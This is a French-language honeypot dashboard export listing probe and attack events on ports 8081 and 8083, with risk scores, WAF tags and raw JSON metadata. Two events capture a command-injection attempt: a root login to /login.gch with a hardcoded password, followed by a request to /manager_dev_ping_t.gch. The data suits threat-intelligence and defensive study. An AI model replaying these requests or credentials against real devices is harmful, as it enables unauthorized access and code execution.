|
|
TCP |
8083 · HTTP ALT 8083
|
http-alt-8083
|
http-alt-8083
http-alt-8083 · via HTTP ALT 8083:8083 · (sonde / probe)
|
Faible
|
Faible · 0
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
Multi-protocole corrélé (5 min)
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
HTTP-ALT-8083
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
Méthode
—
Port
8083
Chemin / cible
—
Pourquoi cette classification : Type « http-alt-8083 » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Meta JSON brut
{
"protocol_emulated": true,
"emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
"emulator_response_len": 82,
"port_inferred_service": true,
"bytes_in": 0,
"payload_entropy": 0,
"port_category": "registered",
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"service": "http-alt-8083",
"app_proto": "http-alt-8083",
"asn": 37963,
"country": "CN",
"dst_port": 8083,
"risk_waf": 8,
"risk_classification": 0,
"risk_behavior": 0,
"risk_geo": 0,
"risk_protocol": 22,
"risk_novelty": 0,
"risk_boost": 0,
"risk_granularity": 3.7,
"risk_breakdown": {
"waf": 8,
"classification": 0,
"behavior": 0,
"geo": 0,
"protocol": 22,
"novelty": 0
},
"risk_score": 0,
"tag_count": 0,
"anomaly_count": 0,
"campaign_key": "4d8aadabcd1c859671a9c5ddc55350e79e517b17",
"event_fingerprint": "aafb7ac8941c9e078930e4799c90ed51eac5bf8d",
"classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%",
"confidence": 0.08,
"classification_confidence": 0.08,
"precision_score": 0,
"precision_signals": [],
"kb_rule_ids": [],
"confidence_breakdown": {
"waf": 8,
"classification": 0,
"behavior": 0,
"geo": 0,
"protocol": 22,
"novelty": 0,
"risk_score": 0,
"correlation_boost": 8
},
"named_classification_skipped": false,
"service_name": "http-alt-8083",
"risk_confidence_factor": 0,
"city": null,
"is_datacenter": false,
"is_tor_hint": false,
"geo": {
"country": "CN",
"asn": 37963,
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"is_datacenter": false,
"is_tor_hint": false
},
"fingerprint": {
"path_pattern_hash": "54f123e610d8386f898485b621afba15"
},
"target_context": {
"dst_port": 8083,
"service": "http-alt-8083",
"service_name": "http-alt-8083",
"risk_score": 0
},
"attack_stage": "probe",
"mitre_tactics": [
"TA0007",
"TA0001"
],
"mitre": "TA0007",
"threat_family": [
"unknown"
],
"recommended_client_action": "monitor",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "6163c2957bda6c59889ded9bedae57bac6349b51",
"protocol_details": {
"port": 8083,
"service": "http-alt-8083",
"service_label_fr": "HTTP ALT 8083"
},
"attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)",
"target_port_label": "8083 \u00b7 HTTP ALT 8083",
"emulator_service": "http-alt-8083",
"confidence_reason": "Confiance faible (0 %) \u2014 classification prudente",
"site_display": {
"classification": null,
"classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%",
"classification_reason_label_fr": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%",
"executive_one_liner_fr": "Activit\u00e9 suspecte",
"confidence_pct": 8,
"confidence_breakdown": {
"waf": 8,
"classification": 0,
"behavior": 0,
"geo": 0,
"protocol": 22,
"novelty": 0,
"risk_score": 0,
"correlation_boost": 8
},
"attack_stage": "probe",
"attack_stage_label": "Sonde \/ probe",
"attack_chain_stage": "discovery",
"attack_chain_stage_label_fr": "D\u00e9couverte",
"risk_score": 0,
"risk_label": "Faible",
"service_name": "http-alt-8083",
"service_label_fr": "HTTP ALT 8083",
"dst_port": 8083,
"protocol_emulated": true,
"tags_summary": null,
"tags_summary_labels_fr": null,
"recommended_action": "monitor",
"recommended_action_label": "Surveiller",
"mitre": "TA0007",
"mitre_technique": "TA0007",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-http-alt-8083",
"correlation_flags": [
"multi_protocol_correlation"
],
"correlation_flags_labels_fr": [
"Multi-protocole corr\u00e9l\u00e9 (5 min)"
],
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": "Corr\u00e9lation +8",
"protocol_details": {
"port": 8083,
"service": "http-alt-8083",
"service_label_fr": "HTTP ALT 8083"
},
"attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)",
"evidence_snippet": null,
"target_port_label": "8083 \u00b7 HTTP ALT 8083",
"emulator_service": "http-alt-8083",
"confidence_reason": "Confiance faible (0 %) \u2014 classification prudente",
"confidence_factors_fr": "Confiance 8 % \u2014 Score WAF 8 \u00b7 Bonus corr\u00e9lation +8",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": true,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": false,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "discovery",
"label_fr": "D\u00e9couverte",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "http_alt_8083",
"service_banner": "honeypot-http-alt-8083",
"service_os": "linux",
"dst_port": "8083"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"multi_protocol_correlation": true,
"multi_protocol_count": 2,
"multi_protocol_sample": [
"http",
"http-alt-8083"
],
"multi_protocol_window_s": 300,
"behavior_alerts": [
"multi_protocol_correlation"
],
"correlation_confidence_boost": 8,
"attack_chain_stage": "discovery",
"matched_patterns": [],
"ban_policy": "advisory_monitor"
}
|
|
|
TCP |
8083 · HTTP
|
http
|
Injection de commande
cmd injection · via HTTP:8083 · (tentative d'exploit) · → /login.gch
|
Élevée
|
Élevé · 82
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
Multi-protocole corrélé (5 min)
MITRE
T1059
TA0001
TA0002
Protocole
POST /login.gch UA r00ts3c-owned-you
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
950327:rce-0
950331:rce-1
950407:ssrf-3
950471:nosqli-3
Cible HTTP
POST
/login.gch
TLS SNI
—
Capteur
paris-1
|
Méthode
POST
Port
8083
Chemin / cible
/login.gch
Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0145
pat-0146
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932200
CRS 932205
TeamSpeak3
Ligne de requête
POST /login.gch HTTP/1.1
User-Agent
r00ts3c-owned-you
Règles WAF
rce-0
rce-1
ssrf-3
nosqli-3
Payload (extrait)
POST /login.gch HTTP/1.1
User-Agent: r00ts3c-owned-you
Content-Length: 420
Connection: keep-alive
Accept: */*
Frm_Loginto
Requête brute (extrait)
POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: */* Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST /manager_dev_ping_t.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length:
Meta JSON brut
{
"protocol_emulated": true,
"emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
"emulator_response_len": 82,
"http_header_count": 4,
"http_query_params": 0,
"http_path_depth": 1,
"http_path_ext": "gch",
"http_ua_hash": "cf457b39ca1ed09a62427df715058d10b039c109",
"http_host_hash": null,
"http_target_hash": "297c504799609cfe753e35db128a9be162f28f7d",
"http_referer_hash": null,
"http_method": "POST",
"http_ua_is_cli": false,
"http_ua_is_browser": false,
"bytes_in": 659,
"payload_entropy": 5.466302572005077,
"port_category": "registered",
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"service": "http",
"app_proto": "http",
"asn": 37963,
"country": "CN",
"dst_port": 8083,
"risk_waf": 100,
"risk_classification": 85,
"risk_behavior": 0,
"risk_geo": 0,
"risk_protocol": 43,
"risk_novelty": 25,
"risk_boost": 15,
"risk_granularity": 6.7,
"risk_breakdown": {
"waf": 100,
"classification": 85,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 25
},
"risk_score": 82,
"tag_count": 11,
"anomaly_count": 0,
"campaign_key": "567ee99ead398d5e8dff08296735fd3324b36997",
"event_fingerprint": "a858fca3b3a8ef48dad20a1cb938d02f0de6e320",
"classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%",
"confidence": 1,
"classification_confidence": 1,
"precision_score": 212,
"precision_signals": [
"INT-http_cmdi",
"pat-0145",
"pat-0146"
],
"kb_rule_ids": [
"INT-http_cmdi",
"pat-0145",
"pat-0146"
],
"matched_patterns": [
"pat-0842",
"pat-0145",
"pat-0146",
"pat-0772"
],
"matched_pattern_names": [
"CRS 921130 duplicate CL",
"CRS 932200",
"CRS 932205",
"TeamSpeak3"
],
"pattern_ids": [
"pat-0842",
"pat-0145",
"pat-0146",
"pat-0772"
],
"confidence_breakdown": {
"waf": 100,
"classification": 85,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 25,
"risk_score": 82,
"correlation_boost": 8
},
"named_classification_skipped": false,
"service_name": "http",
"risk_confidence_factor": 100,
"city": null,
"is_datacenter": false,
"is_tor_hint": false,
"geo": {
"country": "CN",
"asn": 37963,
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"is_datacenter": false,
"is_tor_hint": false
},
"fingerprint": {
"http_ua_hash": "cf908e3be2b0e84af769ea28409d6afb",
"payload_hash": "a6d724e184027cf38cffffe097052d1c",
"path_pattern_hash": "566116aa56cf0726ba77deefe998a873"
},
"target_context": {
"dst_port": 8083,
"service": "http",
"service_name": "http",
"risk_score": 82
},
"payload_preview": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"method": "POST",
"path": "\/login.gch",
"user_agent": "r00ts3c-owned-you",
"waf_tags": [
"950327:rce-0",
"950331:rce-1",
"950407:ssrf-3",
"950471:nosqli-3"
],
"waf_rule_names": [
"rce-0",
"rce-1",
"ssrf-3",
"nosqli-3"
],
"request_line": "POST \/login.gch HTTP\/1.1",
"request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ",
"payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"evidence": {
"method": "POST",
"path": "\/login.gch",
"user_agent": "r00ts3c-owned-you",
"waf_tags": [
"950327:rce-0",
"950331:rce-1",
"950407:ssrf-3",
"950471:nosqli-3"
],
"waf_rule_names": [
"rce-0",
"rce-1",
"ssrf-3",
"nosqli-3"
],
"request_line": "POST \/login.gch HTTP\/1.1",
"request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ",
"payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%"
},
"attack_stage": "exploit_attempt",
"mitre_tactics": [
"TA0001",
"TA0002"
],
"mitre_techniques": [
"T1059",
"T1190"
],
"mitre": "T1059",
"threat_family": [
"rce_probe",
"ssrf_probe"
],
"recommended_client_action": "investigate",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "ed610c2b5afb0b6a17e9237e4e29c602d177650a",
"protocol_details": {
"http_method": "POST",
"http_path": "\/login.gch",
"request_line": "POST \/login.gch HTTP\/1.1",
"http_user_agent": "r00ts3c-owned-you",
"port": 8083,
"service": "http",
"service_label_fr": "HTTP"
},
"evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch",
"target_port_label": "8083 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9",
"site_display": {
"classification": null,
"classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%",
"classification_reason_label_fr": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%",
"executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP \u2014 multi-protocole (2 protocoles \u00b7 5 min)",
"confidence_pct": 100,
"confidence_breakdown": {
"waf": 100,
"classification": 85,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 25,
"risk_score": 82,
"correlation_boost": 8
},
"attack_stage": "exploit_attempt",
"attack_stage_label": "Tentative d'exploit",
"attack_chain_stage": "exploitation",
"attack_chain_stage_label_fr": "Exploitation",
"risk_score": 82,
"risk_label": "\u00c9lev\u00e9",
"service_name": "http",
"service_label_fr": "HTTP",
"dst_port": 8083,
"protocol_emulated": true,
"tags_summary": [
"INT-http_cmdi",
"pat-0145",
"pat-0146"
],
"tags_summary_labels_fr": [
"Http Cmdi",
"pat-0145",
"pat-0146"
],
"recommended_action": "investigate",
"recommended_action_label": "Investiguer",
"mitre": "T1059",
"mitre_technique": "T1059",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-http",
"correlation_flags": [
"multi_protocol_correlation"
],
"correlation_flags_labels_fr": [
"Multi-protocole corr\u00e9l\u00e9 (5 min)"
],
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": "Corr\u00e9lation +8",
"protocol_details": {
"http_method": "POST",
"http_path": "\/login.gch",
"request_line": "POST \/login.gch HTTP\/1.1",
"http_user_agent": "r00ts3c-owned-you",
"port": 8083,
"service": "http",
"service_label_fr": "HTTP"
},
"attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch",
"evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"target_port_label": "8083 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9",
"confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 100 \u00b7 Bonus corr\u00e9lation +8 \u00b7 4 tag(s) WAF",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": false,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": true,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "exploitation",
"label_fr": "Exploitation",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "http",
"service_banner": "honeypot-http",
"service_os": "linux",
"dst_port": "8083"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"multi_protocol_correlation": true,
"multi_protocol_count": 2,
"multi_protocol_sample": [
"http",
"http-alt-8083"
],
"multi_protocol_window_s": 300,
"behavior_alerts": [
"multi_protocol_correlation"
],
"correlation_confidence_boost": 8,
"attack_chain_stage": "exploitation",
"ban_policy": "advisory_investigate",
"tags_list": [
"950327:rce-0",
"950331:rce-1",
"950407:ssrf-3",
"950471:nosqli-3",
"http_cmd_injection",
"http_credential_body",
"http_idor_probe",
"http_jwt_body",
"http_missing_host",
"http_ssrf_body",
"net_web_probe"
]
}
|
|
|
TCP |
8083 · HTTP
|
http
|
Spray credentials
bruteforce credential spray · via HTTP:8083 · (sonde / probe) · → /login.gch
|
Élevée
|
Moyen · 50
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1078
TA0007
TA0001
Protocole
POST /login.gch UA r00ts3c-owned-you
Émulateur
HTTP
WAF
7
Recommandation
Investiguer
Tags
950327:rce-0
http_credential_body
http_missing_host
net_web_probe
Cible HTTP
POST
/login.gch
TLS SNI
—
Capteur
paris-1
|
Méthode
POST
Port
8083
Chemin / cible
/login.gch
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 50
Confiance : Confiance 100 % — 1 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
TeamSpeak3
Ligne de requête
POST /login.gch HTTP/1.1
User-Agent
r00ts3c-owned-you
Règles WAF
rce-0
Payload (extrait)
POST /login.gch HTTP/1.1
User-Agent: r00ts3c-owned-you
Content-Length: 420
Connection: keep-alive
Accept: */*
Frm_Loginto
Requête brute (extrait)
POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: */* Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7.
Meta JSON brut
{
"protocol_emulated": true,
"emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
"emulator_response_len": 82,
"http_header_count": 4,
"http_query_params": 0,
"http_path_depth": 1,
"http_path_ext": "gch",
"http_ua_hash": "cf457b39ca1ed09a62427df715058d10b039c109",
"http_host_hash": null,
"http_target_hash": "297c504799609cfe753e35db128a9be162f28f7d",
"http_referer_hash": null,
"http_method": "POST",
"http_ua_is_cli": false,
"http_ua_is_browser": false,
"bytes_in": 170,
"payload_entropy": 5.23129052657496,
"port_category": "registered",
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"service": "http",
"app_proto": "http",
"asn": 37963,
"country": "CN",
"dst_port": 8083,
"risk_waf": 36,
"risk_classification": 78,
"risk_behavior": 0,
"risk_geo": 0,
"risk_protocol": 43,
"risk_novelty": 15,
"risk_boost": 0,
"risk_granularity": 5.1,
"risk_breakdown": {
"waf": 36,
"classification": 78,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 15
},
"risk_score": 50,
"tag_count": 4,
"anomaly_count": 0,
"campaign_key": "9ce5d8169570408e2106ad2b8e3d57e3d4b5a93b",
"event_fingerprint": "6468067ec5b7ac1448902e755fb38eb1e7f855e0",
"classification_reason": "Type \u00ab bruteforce_credential_spray \u00bb (signaux protocolaires) \u00b7 confiance 100%",
"confidence": 1,
"classification_confidence": 1,
"precision_score": 121,
"precision_signals": [
"MITRE-T1078",
"INT-beh-cred-stuff"
],
"kb_rule_ids": [
"MITRE-T1078",
"INT-beh-cred-stuff"
],
"matched_patterns": [
"pat-0842",
"pat-0772"
],
"matched_pattern_names": [
"CRS 921130 duplicate CL",
"TeamSpeak3"
],
"pattern_ids": [
"pat-0842",
"pat-0772"
],
"confidence_breakdown": {
"waf": 36,
"classification": 78,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 15,
"risk_score": 50
},
"named_classification_skipped": false,
"classification_parent": "credential_stuffing",
"service_name": "http",
"risk_confidence_factor": 100,
"city": null,
"is_datacenter": false,
"is_tor_hint": false,
"geo": {
"country": "CN",
"asn": 37963,
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"is_datacenter": false,
"is_tor_hint": false
},
"fingerprint": {
"http_ua_hash": "cf908e3be2b0e84af769ea28409d6afb",
"payload_hash": "517c5099029829c4a474654813e4ba02",
"path_pattern_hash": "566116aa56cf0726ba77deefe998a873"
},
"target_context": {
"dst_port": 8083,
"service": "http",
"service_name": "http",
"risk_score": 50
},
"payload_preview": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"method": "POST",
"path": "\/login.gch",
"user_agent": "r00ts3c-owned-you",
"waf_tags": [
"950327:rce-0"
],
"waf_rule_names": [
"rce-0"
],
"request_line": "POST \/login.gch HTTP\/1.1",
"request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.",
"payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"evidence": {
"method": "POST",
"path": "\/login.gch",
"user_agent": "r00ts3c-owned-you",
"waf_tags": [
"950327:rce-0"
],
"waf_rule_names": [
"rce-0"
],
"request_line": "POST \/login.gch HTTP\/1.1",
"request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.",
"payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"classification_reason": "Type \u00ab bruteforce_credential_spray \u00bb (signaux protocolaires) \u00b7 confiance 100%"
},
"attack_stage": "probe",
"mitre_tactics": [
"TA0007",
"TA0001"
],
"mitre_techniques": [
"T1078",
"T1110"
],
"mitre": "T1078",
"threat_family": [
"unknown"
],
"recommended_client_action": "investigate",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "1bb83fbe6dc16d7a97a3f9ec91f7b2090f4c590b",
"protocol_details": {
"http_method": "POST",
"http_path": "\/login.gch",
"request_line": "POST \/login.gch HTTP\/1.1",
"http_user_agent": "r00ts3c-owned-you",
"port": 8083,
"service": "http",
"service_label_fr": "HTTP"
},
"evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"attack_vector": "bruteforce credential spray \u00b7 via HTTP:8083 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/login.gch",
"target_port_label": "8083 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 1 tag(s) WAF",
"site_display": {
"classification": null,
"classification_reason": "Type \u00ab bruteforce_credential_spray \u00bb (signaux protocolaires) \u00b7 confiance 100%",
"classification_reason_label_fr": "Type \u00ab bruteforce_credential_spray \u00bb (signaux protocolaires) \u00b7 confiance 100%",
"executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 50\/100 (Moyen) \u2014 MITRE T1078 \u2014 confiance 100 % \u2014 via HTTP",
"confidence_pct": 100,
"confidence_breakdown": {
"waf": 36,
"classification": 78,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 15,
"risk_score": 50
},
"attack_stage": "probe",
"attack_stage_label": "Sonde \/ probe",
"attack_chain_stage": "discovery",
"attack_chain_stage_label_fr": "D\u00e9couverte",
"risk_score": 50,
"risk_label": "Moyen",
"service_name": "http",
"service_label_fr": "HTTP",
"dst_port": 8083,
"protocol_emulated": true,
"tags_summary": [
"MITRE-T1078",
"INT-beh-cred-stuff"
],
"tags_summary_labels_fr": [
"MITRE-T1078",
"Beh Cred Stuff"
],
"recommended_action": "investigate",
"recommended_action_label": "Investiguer",
"mitre": "T1078",
"mitre_technique": "T1078",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-http",
"correlation_flags": null,
"correlation_flags_labels_fr": null,
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": null,
"protocol_details": {
"http_method": "POST",
"http_path": "\/login.gch",
"request_line": "POST \/login.gch HTTP\/1.1",
"http_user_agent": "r00ts3c-owned-you",
"port": 8083,
"service": "http",
"service_label_fr": "HTTP"
},
"attack_vector": "bruteforce credential spray \u00b7 via HTTP:8083 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/login.gch",
"evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
"target_port_label": "8083 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 1 tag(s) WAF",
"confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 36 \u00b7 1 tag(s) WAF",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": true,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": false,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "discovery",
"label_fr": "D\u00e9couverte",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "http",
"service_banner": "honeypot-http",
"service_os": "linux",
"dst_port": "8083"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"attack_chain_stage": "discovery",
"ban_policy": "advisory_investigate",
"tags_list": [
"950327:rce-0",
"http_credential_body",
"http_missing_host",
"net_web_probe"
]
}
|
|
|
TCP |
8081 · HTTP ALT 8081
|
http-alt-8081
|
http-alt-8081
http-alt-8081 · via HTTP ALT 8081:8081 · (sonde / probe)
|
Faible
|
Faible · 0
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
Multi-protocole corrélé (5 min)
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
HTTP-ALT-8081
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
Méthode
—
Port
8081
Chemin / cible
—
Pourquoi cette classification : Type « http-alt-8081 » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 0
Confiance : Confiance faible (0 %) — classification prudente
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Meta JSON brut
{
"protocol_emulated": true,
